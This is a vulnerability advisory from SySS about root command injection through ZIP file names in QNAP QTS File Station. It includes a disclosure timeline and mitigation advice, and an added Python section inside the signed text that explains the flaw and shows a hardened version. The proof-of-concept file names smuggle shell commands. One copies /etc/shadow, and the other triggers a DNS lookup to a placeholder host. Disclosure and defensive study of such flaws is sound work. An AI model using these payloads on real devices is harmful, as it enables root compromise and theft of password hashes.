QNAP QTS 4.2.0 Build 20160311 / Build 20160601 Command Injection

18 Aug 2016, reported by Sebastian Nerz. Type: packetstorm. Source: packetstormsecurity.com

QNAP QTS 4.2.0 Build 20160311/20160601 command injection vulnerability in File Station

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2016-048  
Product: QNAP QTS  
Manufacturer: QNAP  
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601  
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812  
Vulnerability Type: OS Command Injection (CWE-78)  
Risk Level: High  
Solution Status: unfixed  
Manufacturer Notification: 2016-06-03  
Solution Date: tbd.  
Public Disclosure: 2016-08-18  
CVE Reference: Not assigned  
Author of Advisory: Sebastian Nerz (SySS GmbH)  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
QTS is the operating system used by manufacturer QNAP on its series of  
NAS devices (see [1]).  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
  
SySS GmbH found an OS command injection in the File Station of the  
current QTS administrative interface.  
  
This type of vulnerability allows an attacker to run arbitrary commands  
on the operating system of the host as root.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC, Build 20160311)  
  
1. Log in to the QNAP. The user needs sufficient permissions to either  
rename or create ZIP files.  
2. Upload or create a ZIP file with the following name:  
  
a;echo -e "cp \x2fetc\x2fshadow \x2fshare\x2fCACHEDEV1_DATA\x2f[current  
dir]" | bash ; echo .zip  
  
3. Right-click on the ZIP file and select Extract > Extract to   
[pre-selected directory with the name of the ZIP file]  
(Extract > last entry)  
  
4. The contained code will be executed; in this case /etc/shadow is copied  
to the current directory. Other code can of course be run as well,  
e.g. to display some strings on the front display of the QNAP (tested  
with a 470 Pro), name the ZIP file like this and extract it:  
  
a;lcd_tool -1 PoC -2 OS-Command-Injection; echo .zip  
  
Depending on the system this might not work out of the box.  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC, Build 20160601)  
  
1. Log in to the QNAP. The user needs sufficient permissions to either  
rename or create ZIP files.  
2. Upload or create a ZIP file with the following name:  
  
test$(nslookup examplehost).zip  
  
3. Right-click on the ZIP file and select Extract > Extract files  
  
4. The contained code will be executed as can be confirmed by listening   
on the corresponding network.  
  
The original exploit (Extract > last entry) will not work on the current  
release of QTS. This exploit should work on previous versions of QTS as  
well.  
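The two PoCs above both work because the archive name is spliced into a command line that a shell parses. The following is an added example, not code from the SySS advisory or from QNAP (the QTS File Station code is not public, so the vulnerable builder is an assumed reconstruction of the pattern): it makes the injected commands visible without running them, shows the hardened argv form, and gives a validation check for upload/rename events.

```python
"""Added example, not from the advisory or QNAP: why a file name that reaches
a shell string is an OS command injection (CWE-78), and how the same unzip
call is built safely. vulnerable_command() is an assumed reconstruction."""
import re

# Archive names constructed from the advisory's two PoCs, plus a benign one
POC_20160311 = r'a;echo -e "cp \x2fetc\x2fshadow \x2fshare\x2fCACHEDEV1_DATA\x2f[current dir]" | bash ; echo .zip'
POC_20160601 = "test$(nslookup examplehost).zip"
BENIGN = "Quarterly Report (final).zip"

SHELL_META = re.compile(r"[;|&`$<>\n]")


def vulnerable_command(archive: str, dest: str) -> str:
    """Assumed vulnerable pattern: the user-controlled name is pasted into a
    command line handed to /bin/sh, so ';', '|' and '$(...)' are parsed by
    the shell instead of being treated as part of the name."""
    return f"unzip -o {archive} -d {dest}"


def shell_segments(cmd: str) -> list:
    """Approximate how a POSIX shell cuts a command line at unquoted ';' and
    '|'; enough to make injected commands visible without executing them.
    Command substitution ($(...)) is deliberately not modelled here."""
    segs, cur, quote = [], [], None
    for ch in cmd:
        if quote:
            cur.append(ch)
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
            cur.append(ch)
        elif ch in ";|":
            segs.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    segs.append("".join(cur).strip())
    return [s for s in segs if s]


def hardened_argv(archive: str, dest: str) -> list:
    """Hardened form: an argv list for subprocess.run() with no shell, so the
    whole name stays one literal argument ('--' also stops option injection)."""
    return ["unzip", "-o", "--", archive, "-d", dest]


def looks_like_injection(name: str) -> bool:
    """Validation/detection check for upload or rename events: a name that
    carries shell metacharacters should be rejected and logged."""
    return SHELL_META.search(name) is not None
```

Note that the 20160601 name produces a single segment yet is still flagged: the `$(...)` substitution is expanded by the shell before any command boundary exists, which is why metacharacter validation, not command splitting, is the right check.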
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
The manufacturer has not released any security update or patch so far.  
Administrators of QNAP QTS 4.2 installations should ensure that only   
trusted users/administrators have access to the device.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2016-06-03: Vulnerability discovered and reported to manufacturer  
2016-06-20: Vulnerability report confirmed by manufacturer  
2016-06-22: Report updated to address (minor) changes in build 20160601  
2016-07-06: Updated report confirmed by manufacturer  
2016-07-06: Manufacturer asked for timeline regarding a fix  
2016-07-18: Manufacturer reminded about upcoming public disclosure  
2016-08-18: Public disclosure  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for QNAP QTS  
http://www.qnap.com/qts/4.2/en/  
[2] SySS Security Advisory SYSS-2016-048  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-048.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy/  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
Security vulnerability found by Sebastian Nerz of the SySS GmbH.  
  
E-Mail: sebastian.nerz-at-syss.de  
Public Key:  
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc  
Key ID: 0x9180FDB2  
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----  
-----END PGP SIGNATURE-----  
